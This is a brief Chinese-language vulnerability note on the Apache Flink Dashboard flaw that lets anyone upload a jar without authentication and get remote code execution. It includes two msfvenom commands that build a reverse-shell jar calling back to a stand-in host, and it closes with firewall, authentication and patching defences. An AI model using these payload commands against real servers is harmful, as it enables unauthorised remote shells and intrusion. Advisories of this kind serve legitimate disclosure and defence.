0x00 概述
20191111,网上爆出Apache Flink上传jar包导致远程代码执行的漏洞(安全工程师Henry Chen披露)。因为Apache Flink Dashboard 默认无需认证即可访问,所以可以上传恶意jar包并触发恶意代码执行,从而getshell。
影响范围<= 1.9.1
0x01 漏洞重现
“apache-flink-dashboard”
1)利用MSF
msfvenom -p java/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=7766 W >poc.jar
2)利用nc
msfvenom -p java/shell_reverse_tcp lhost=1.2.3.4 lport=7766 -f jar > poc.jar
0x02 防御方案
1.设置防火墙策略,仅允许白名单ip访问 apache flink。
2.Web代理(如apache httpd)中增加对该服务的digest认证。
3.关注官网新版本或补丁更新。